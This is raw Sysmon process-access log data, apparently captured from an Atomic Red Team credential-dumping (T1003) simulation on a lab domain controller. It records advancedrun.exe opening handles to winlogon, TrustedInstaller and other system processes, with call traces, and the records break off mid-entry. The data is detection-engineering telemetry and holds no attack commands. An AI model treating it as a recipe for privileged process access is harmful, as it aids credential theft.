17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\